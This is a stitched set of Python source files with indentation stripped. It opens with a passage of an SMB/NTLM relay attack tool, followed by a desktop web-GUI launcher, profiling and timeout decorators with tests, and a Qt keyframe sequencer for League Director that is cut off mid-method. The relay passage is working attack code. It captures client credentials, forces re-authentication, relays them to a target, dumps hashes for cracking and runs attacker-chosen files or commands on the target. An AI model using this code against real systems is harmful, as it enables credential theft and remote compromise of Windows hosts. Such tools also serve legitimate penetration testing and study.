# accept-incomplete. We want more data
respToken['NegResult'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now that we have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send its credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = b'\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send its credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat(b'', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Specifies the status to return to the connecting client after a successful relayed
# authentication. This comes in handy when we don't want the connecting client to cache
# the credentials as valid. Valid statuses:
# STATUS_SUCCESS - tells the connecting client that it passed valid credentials,
# which will make it store them accordingly.
# STATUS_ACCESS_DENIED - may occur, for instance, when the client is not a Domain Admin
# and Remote UAC is configured, preventing the connection to ADMIN$.
# STATUS_LOGON_FAILURE - tells the connecting client that the passed credentials
# are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
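# Minimal usage sketch (hypothetical caller, mirroring the __main__ block below):
#
#   relay = SMBRelayServer()
#   relay.setReturnStatus('denied')   # connecting client will be told STATUS_ACCESS_DENIED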
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print("")
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
webgui.py
|
import os
from datetime import datetime
import logging
import tempfile
import subprocess as sps
from threading import Lock, Thread
from scan_system.wsgi import application
logging.basicConfig(
level=logging.INFO, format="flaskwebgui - [%(levelname)s] - %(message)s"
)
def find_chrome_win():
# using Edge by default since it's built on Chromium
edge_path = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
if os.path.exists(edge_path):
return edge_path
import winreg as reg
reg_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe"
chrome_path = None
last_exception = None
for install_type in reg.HKEY_CURRENT_USER, reg.HKEY_LOCAL_MACHINE:
try:
reg_key = reg.OpenKey(install_type, reg_path, 0, reg.KEY_READ)
chrome_path = reg.QueryValue(reg_key, None)
reg_key.Close()
except WindowsError as e:
last_exception = e
else:
if chrome_path and len(chrome_path) > 0:
break
# Only log some debug info if we failed completely to find chrome
if not chrome_path:
logging.exception(last_exception)
logging.error("Failed to detect chrome location from registry")
else:
logging.info(f"Chrome path detected as: {chrome_path}")
return chrome_path
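# Typical value read from the registry above (illustrative path only):
#   C:\Program Files\Google\Chrome\Application\chrome.exe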
def get_default_chrome_path():
"""
Credits: the get_instance_path, find_chrome_mac, find_chrome_linux and find_chrome_win helpers
are adapted from https://github.com/ChrisKnott/Eel/blob/master/eel/chrome.py
"""
return find_chrome_win()
current_timestamp = None
class FlaskUI:
def __init__(
self,
app,
width=800,
height=600,
maximized=False,
fullscreen=False,
browser_path=None,
socketio=None,
on_exit=None,
idle_interval=5,
close_server_on_exit=True,
) -> None:
self.app = app
self.width = str(width)
self.height = str(height)
self.fullscreen = fullscreen
self.maximized = maximized
self.browser_path = browser_path if browser_path else get_default_chrome_path()
self.socketio = socketio
self.on_exit = on_exit
self.idle_interval = idle_interval
self.close_server_on_exit = close_server_on_exit
self.host = "127.0.0.1"
self.port = 8000
self.localhost = f"http://{self.host}:{self.port}"
if self.close_server_on_exit:
self.lock = Lock()
def update_timestamp(self):
self.lock.acquire()
global current_timestamp
current_timestamp = datetime.now()
self.lock.release()
def run(self):
"""
Starts three threads: one for the web framework server, one for the browser GUI and one to stop the web server on exit
"""
if self.close_server_on_exit:
self.update_timestamp()
t_start_webserver = Thread(target=self.start_django)
t_open_chromium = Thread(target=self.open_chromium)
t_stop_webserver = Thread(target=self.stop_webserver)
threads = [t_start_webserver, t_open_chromium, t_stop_webserver]
for t in threads:
t.start()
for t in threads:
t.join()
def start_django(self):
try:
import waitress
waitress.serve(self.app, host=self.host, port=self.port)
except ImportError:
os.system(f"python manage.py runserver {self.port}")
def open_chromium(self):
"""
Open the browser selected (by default it looks for chrome)
# https://peter.sh/experiments/chromium-command-line-switches/
"""
logging.info(f"Opening browser at {self.localhost}")
temp_profile_dir = os.path.join(tempfile.gettempdir(), "flaskwebgui")
if self.browser_path:
launch_options = None
if self.fullscreen:
launch_options = ["--start-fullscreen"]
elif self.maximized:
launch_options = ["--start-maximized"]
else:
launch_options = [f"--window-size={self.width},{self.height}"]
options = (
[
self.browser_path,
f"--user-data-dir={temp_profile_dir}",
"--new-window",
"--no-first-run",
# "--window-position=0,0"
]
+ launch_options
+ [f"--app={self.localhost}"]
)
sps.Popen(options, stdout=sps.PIPE, stderr=sps.PIPE, stdin=sps.PIPE)
else:
import webbrowser
webbrowser.open_new(self.localhost)
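# Example of the command line assembled above (illustrative values, default geometry):
#   msedge.exe --user-data-dir=<TEMP>\flaskwebgui --new-window --no-first-run \
#       --window-size=800,600 --app=http://127.0.0.1:8000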
def stop_webserver(self):
if self.close_server_on_exit is False:
return
# TODO add middleware for Django
logging.info("Middleware not implemented (yet) for Django.")
return
def keep_server_running(self):
self.update_timestamp()
return "Ok"
if __name__ == "__main__":
FlaskUI(application, maximized=True).run()
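# Alternative entry point (sketch only; the browser path below is hypothetical):
#   FlaskUI(application, width=1024, height=768,
#           browser_path=r"C:\Program Files\Google\Chrome\Application\chrome.exe").run()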
|
test_decorators.py
|
from threading import Thread
import cProfile, pstats, io, os, errno, signal, time
from functools import wraps
from contextlib import contextmanager
from utilmy.debug import log
def test_all():
"""function test_all
Args:
Returns:
"""
test_decorators()
test_decorators2()
def test_decorators():
"""
#### python test.py test_decorators
"""
from utilmy.decorators import thread_decorator, timeout_decorator, profiler_context,profiler_decorator, profiler_decorator_base
@thread_decorator
def thread_decorator_test():
log("thread decorator")
@profiler_decorator_base
def profiler_decorator_base_test():
log("profiler decorator")
@timeout_decorator(10)
def timeout_decorator_test():
log("timeout decorator")
profiler_decorator_base_test()
timeout_decorator_test()
thread_decorator_test()
def test_decorators2():
"""function test_decorators2
Args:
Returns:
"""
from utilmy.decorators import profiler_decorator, profiler_context
@profiler_decorator
def profiled_sum():
return sum(range(100000))
profiled_sum()
with profiler_context():
x = sum(range(1000000))
print(x)
from utilmy import profiler_start, profiler_stop
profiler_start()
print(sum(range(1000000)))
profiler_stop()
###################################################################################
from utilmy.decorators import timer_decorator
@timer_decorator
def dummy_func():
time.sleep(2)
class DummyClass:
@timer_decorator
def method(self):
time.sleep(3)
dummy_func()
a = DummyClass()
a.method()
########################################################################################################################
########################################################################################################################
def thread_decorator(func):
""" A decorator to run function in background on thread
Return:
background_thread: ``Thread``
"""
@wraps(func)
def wrapper(*args, **kwargs):
background_thread = Thread(target=func, args=args, kwargs=kwargs)
background_thread.daemon = True
background_thread.start()
return background_thread
return wrapper
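# Minimal usage sketch for thread_decorator (hypothetical worker, defined here only for
# illustration and never invoked automatically).
@thread_decorator
def _example_background_sum(n=100000):
    # Runs on a daemon thread; the caller immediately gets the Thread object back.
    log("background sum: {}".format(sum(range(n))))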
########################################################################################################################
class _TimeoutError(Exception):
"""Time out error"""
pass
########################################################################################################################
def timeout_decorator(seconds=10, error_message=os.strerror(errno.ETIME)):
"""Decorator to throw timeout error, if function doesnt complete in certain time
Args:
seconds:``int``
No of seconds to wait
error_message:``str``
Error message
"""
def decorator(func):
def _handle_timeout(signum, frame):
raise _TimeoutError(error_message)
def wrapper(*args, **kwargs):
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
return decorator
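# Illustrative sketch of timeout_decorator usage (SIGALRM based, so Unix-only and
# restricted to the main thread); the function below is hypothetical and never called here.
@timeout_decorator(seconds=2, error_message="took longer than 2 seconds")
def _example_bounded_call():
    time.sleep(1)  # finishes inside the 2 second budget, so no _TimeoutError is raised
    return "done"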
def timer_decorator(func):
"""
Decorator to show the execution time of a function or a method in a class.
"""
@wraps(func)
def wrapper(*args, **kwargs):
start = time.perf_counter()
result = func(*args, **kwargs)
end = time.perf_counter()
print(f'function {func.__name__} finished in: {(end - start):.2f} s')
return result
return wrapper
########################################################################################################################
@contextmanager
def profiler_context():
"""
Context Manager the will profile code inside it's bloc.
And print the result of profiler.
Example:
with profiler_context():
# code to profile here
"""
from pyinstrument import Profiler
profiler = Profiler()
profiler.start()
try:
yield profiler
except Exception as e:
raise e
finally:
profiler.stop()
print(profiler.output_text(unicode=True, color=True))
def profiler_decorator(func):
"""
A decorator that will profile a function
And print the result of profiler.
"""
@wraps(func)
def wrapper(*args, **kwargs):
from pyinstrument import Profiler
profiler = Profiler()
profiler.start()
result = func(*args, **kwargs)
profiler.stop()
print(profiler.output_text(unicode=True, color=True))
return result
return wrapper
def profiler_decorator_base(fnc):
"""
A decorator that uses cProfile to profile a function
And print the result
"""
def inner(*args, **kwargs):
pr = cProfile.Profile()
pr.enable()
retval = fnc(*args, **kwargs)
pr.disable()
s = io.StringIO()
sortby = "cumulative"
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
print(s.getvalue())
return retval
return inner
def test0():
"""function test0
Args:
Returns:
"""
with profiler_context():
x = sum(range(1000000))
print(x)
from utilmy import profiler_start, profiler_stop
profiler_start()
print(sum(range(1000000)))
profiler_stop()
@thread_decorator
def thread_decorator_test():
"""function thread_decorator_test
Args:
Returns:
"""
log("thread decorator")
@profiler_decorator_base
def profiler_decorator_base_test():
"""function profiler_decorator_base_test
Args:
Returns:
"""
log("profiler decorator")
@timeout_decorator(10)
def timeout_decorator_test():
"""function timeout_decorator_test
Args:
Returns:
"""
log("timeout decorator")
@profiler_decorator
def profiled_sum():
"""function profiled_sum
Args:
Returns:
"""
return sum(range(100000))
@timer_decorator
def dummy_func():
"""function dummy_func
Args:
Returns:
"""
time.sleep(2)
|
sequencer.py
|
import copy
import threading
import webbrowser
import statistics
from operator import attrgetter, methodcaller
from PySide2.QtGui import *
from PySide2.QtCore import *
from PySide2.QtWidgets import *
from leaguedirector.widgets import *
PRECISION = 10000.0
SNAPPING = 4
OVERLAP = 4
ADJACENT = 0.05
class SequenceKeyframe(QGraphicsPixmapItem):
def __init__(self, api, item, track):
self.pixmapNormal = QPixmap(respath('kfnormal.png'))
self.pixmapOverlap = QPixmap(respath('kfoverlap.png'))
QGraphicsPixmapItem.__init__(self, self.pixmapNormal, track)
self.api = api
self.track = track
self.item = item
self.duplicate = None
self.setCursor(Qt.ArrowCursor)
self.setShapeMode(QGraphicsPixmapItem.BoundingRectShape)
flags = QGraphicsItem.ItemIgnoresTransformations
flags |= QGraphicsItem.ItemIsMovable
flags |= QGraphicsItem.ItemIsSelectable
flags |= QGraphicsItem.ItemSendsGeometryChanges
self.setFlags(flags)
self.setOffset(-10, 3)
self.update()
def viewport(self):
return self.scene().views()[0]
@property
def time(self):
return self.item['time']
@time.setter
def time(self, value):
if self.item['time'] != value:
self.item['time'] = value
self.api.sequence.update()
self.track.updateOverlap()
self.update()
@property
def valueType(self):
value = self.item['value']
if isinstance(value, float):
return 'float'
elif isinstance(value, bool):
return 'bool'
elif isinstance(value, dict):
if 'x' in value and 'y' in value and 'z' in value:
return 'vector'
if 'r' in value and 'g' in value and 'b' in value and 'a' in value:
return 'color'
return ''
@property
def value(self):
return self.item['value']
@value.setter
def value(self, value):
if self.item['value'] != value:
self.item['value'] = value
self.api.sequence.update()
self.update()
@property
def blend(self):
return self.item.get('blend')
@blend.setter
def blend(self, value):
if self.item.get('blend') != value:
self.item['blend'] = value
self.api.sequence.update()
self.update()
def update(self):
self.setPos(int(self.time * PRECISION), 0)
self.setToolTip(self.tooltip())
def tooltip(self):
value = self.value
if isinstance(value, dict):
value = tuple(value.values())
return 'Time: {}\nBlend: {}\nValue: {}'.format(self.time, self.blend, value)
def delete(self):
self.api.sequence.removeKeyframe(self.track.name, self.item)
self.scene().removeItem(self)
def setOverlapping(self, overlapping):
self.setPixmap(self.pixmapOverlap if overlapping else self.pixmapNormal)
def mouseDoubleClickEvent(self, event):
if event.button() == Qt.LeftButton and event.modifiers() == Qt.NoModifier:
if len(self.scene().selectedItems()) < 2:
self.api.playback.pause(self.time)
event.accept()
QGraphicsPixmapItem.mouseDoubleClickEvent(self, event)
def mouseReleaseEvent(self, event):
for key in self.scene().selectedItems():
if isinstance(key, SequenceKeyframe):
key.duplicate = None
QGraphicsPixmapItem.mouseReleaseEvent(self, event)
def itemChange(self, change, value):
if change == QGraphicsItem.ItemPositionChange:
value.setX(self.performSnapping(value.x()))
value.setX(max(0, value.x()))
value.setY(0)
self.performDuplication()
return value
elif change == QGraphicsItem.ItemPositionHasChanged:
if value:
self.time = value.x() / PRECISION
return QGraphicsPixmapItem.itemChange(self, change, value)
def performDuplication(self):
if self.isSelected() and self.duplicate is None:
if QApplication.mouseButtons() == Qt.LeftButton:
if QApplication.keyboardModifiers() == Qt.AltModifier:
self.duplicate = self.track.duplicateKeyframe(self)
def performSnapping(self, time):
if QApplication.mouseButtons() == Qt.LeftButton:
if QApplication.keyboardModifiers() == Qt.NoModifier:
if len(self.scene().selectedItems()) < 2:
scene = self.scene()
viewport = self.viewport()
screenPosition = viewport.mapFromScene(time, 0).x()
left = viewport.mapToScene(screenPosition - SNAPPING, 0).x()
right = viewport.mapToScene(screenPosition + SNAPPING, 0).x()
items = scene.items(left, float(0), right - left, scene.height(), Qt.IntersectsItemBoundingRect, Qt.AscendingOrder)
for item in items:
if isinstance(item, SequenceKeyframe):
if item != self and not item.isSelected() and item.track != self.track:
return item.x()
elif isinstance(item, SequenceTime):
return self.api.playback.time * PRECISION
return time
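# Note on units (derived from the code above): keyframe X positions live in scene units
# of time * PRECISION, so a keyframe at t = 1.5 s sits at x = 15000 and is mapped back
# with x / PRECISION whenever it moves; SNAPPING and OVERLAP are expressed in screen
# pixels and converted through the viewport transform.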
class SequenceTrack(QGraphicsRectItem):
height = 22
def __init__(self, api, name, index):
QGraphicsRectItem.__init__(self)
self.api = api
self.name = name
self.index = index
self.setPos(0, self.height * self.index)
self.setToolTip(self.api.sequence.getLabel(self.name))
self.setPen(QPen(QColor(70, 70, 70, 255)))
self.updateOverlapTimer = QTimer()
self.updateOverlapTimer.timeout.connect(self.updateOverlapNow)
self.updateOverlapTimer.setSingleShot(True)
self.gradient = QLinearGradient(QPointF(0, 0), QPointF(120 * PRECISION, 0))
self.gradient.setColorAt(0, QColor(30, 30, 30, 255))
self.gradient.setColorAt(0.49999999999999, QColor(30, 30, 30, 255))
self.gradient.setColorAt(0.5, QColor(40, 40, 40, 255))
self.gradient.setColorAt(1, QColor(40, 40, 40, 255))
self.gradient.setSpread(QGradient.RepeatSpread)
self.setBrush(QBrush(self.gradient))
self.reload()
self.update()
def viewport(self):
return self.scene().views()[0]
def paint(self, *args):
self.updateOverlap()
return QGraphicsRectItem.paint(self, *args)
def reload(self):
for item in self.childItems():
if isinstance(item, SequenceKeyframe):
self.scene().removeItem(item)
for item in self.api.sequence.getKeyframes(self.name):
SequenceKeyframe(self.api, item, self)
def addKeyframe(self):
item = self.api.sequence.createKeyframe(self.name)
return SequenceKeyframe(self.api, item, self)
def duplicateKeyframe(self, keyframe):
item = copy.deepcopy(keyframe.item)
self.api.sequence.appendKeyframe(self.name, item)
return SequenceKeyframe(self.api, item, self)
def clearKeyframes(self):
for item in self.childItems():
if isinstance(item, SequenceKeyframe):
item.delete()
def updateOverlapNow(self):
viewport = self.viewport()
distance = viewport.mapToScene(OVERLAP, 0).x() - viewport.mapToScene(0, 0).x()
previous = None
for child in sorted(self.childItems(), key=methodcaller('x')):
if isinstance(child, SequenceKeyframe):
if previous and abs(child.x() - previous.x()) < distance:
child.setOverlapping(True)
previous.setOverlapping(True)
else:
child.setOverlapping(False)
previous = child
def updateOverlap(self):
self.updateOverlapTimer.start(100)
def update(self):
self.setRect(0, 0, int(self.api.playback.length * PRECISION), self.height)
class SequenceHeader(QGraphicsRectItem):
height = 22
def __init__(self, api, name, index, callback):
QGraphicsRectItem.__init__(self)
self.api = api
self.name = name
self.index = index
self.callback = callback
self.setPos(0, self.height * self.index)
self.setRect(0, 0, 160, self.height)
self.setToolTip(self.label())
self.setPen(QPen(Qt.NoPen))
self.setBrush(QColor(20, 20, 50, 255))
self.setFlags(QGraphicsItem.ItemIgnoresTransformations)
self.text = QGraphicsSimpleTextItem(self.label(), self)
self.text.setBrush(QApplication.palette().brightText())
self.text.setPos(145 - self.text.boundingRect().width() - 20, 4)
self.button = QGraphicsPixmapItem(QPixmap(respath('plus.png')), self)
self.button.setPos(140, 4)
self.button.setCursor(Qt.ArrowCursor)
self.button.mousePressEvent = lambda event: self.callback(self.name)
def label(self):
return self.api.sequence.getLabel(self.name)
class SequenceHeaderView(QGraphicsView):
addKeyframe = Signal(str)
def __init__(self, api):
self.api = api
self.scene = QGraphicsScene()
QGraphicsView.__init__(self, self.scene)
self.setFixedWidth(162)
self.setAlignment(Qt.AlignLeft | Qt.AlignTop)
self.setDragMode(QGraphicsView.ScrollHandDrag)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
for index, name in enumerate(self.api.sequence.keys()):
self.scene.addItem(SequenceHeader(self.api, name, index, self.addKeyframe.emit))
class SequenceTime(QGraphicsLineItem):
pass
class SequenceTrackView(QGraphicsView):
selectionChanged = Signal()
def __init__(self, api, headers):
self.api = api
self.scene = QGraphicsScene()
QGraphicsView.__init__(self, self.scene)
self.tracks = {}
self.timer = schedule(10, self.animate)
self.scale(1.0 / PRECISION, 1.0)
self.setDragMode(QGraphicsView.NoDrag)
self.setAlignment(Qt.AlignLeft | Qt.AlignTop)
self.setTransformationAnchor(QGraphicsView.AnchorUnderMouse)
self.setSizeAdjustPolicy(QAbstractScrollArea.AdjustToContents)
for index, name in enumerate(self.api.sequence.keys()):
track = SequenceTrack(self.api, name, index)
self.scene.addItem(track)
self.tracks[name] = track
self.time = SequenceTime(0, 1, 0, self.scene.height() - 2)
self.time.setPen(QPen(QApplication.palette().highlight(), 1))
self.time.setFlags(QGraphicsItem.ItemIgnoresTransformations)
self.scene.addItem(self.time)
self.api.playback.updated.connect(self.update)
self.api.sequence.updated.connect(self.update)
self.api.sequence.dataLoaded.connect(self.reload)
headers.addKeyframe.connect(self.addKeyframe)
headers.verticalScrollBar().valueChanged.connect(lambda value: self.verticalScrollBar().setValue(value))
self.verticalScrollBar().valueChanged.connect(lambda value: headers.verticalScrollBar().setValue(value))
self.scene.selectionChanged.connect(self.selectionChanged.emit)
def reload(self):
for track in self.tracks.values():
track.reload()
def selectedKeyframes(self):
return [key for key in self.scene.selectedItems() if isinstance(key, SequenceKeyframe)]
def allKeyframes(self):
return [key for key in self.scene.items() if isinstance(key, SequenceKeyframe)]
def addKeyframe(self, name):
self.tracks[name].addKeyframe()
def clearKeyframes(self):
for track in self.tracks.values():
track.clearKeyframes()
def deleteSelectedKeyframes(self):
for selected in self.selectedKeyframes():
selected.delete()
def selectAllKeyframes(self):
for child in self.allKeyframes():
child.setSelected(True)
def selectAdjacentKeyframes(self):
for selected in self.selectedKeyframes():
for child in self.allKeyframes():
if abs(child.time - selected.time) < ADJACENT:
child.setSelected(True)
def selectNextKeyframe(self):
selectionSorted = sorted(self.selectedKeyframes(), key=attrgetter('time'))
trackSelection = {key.track : key for key in selectionSorted}
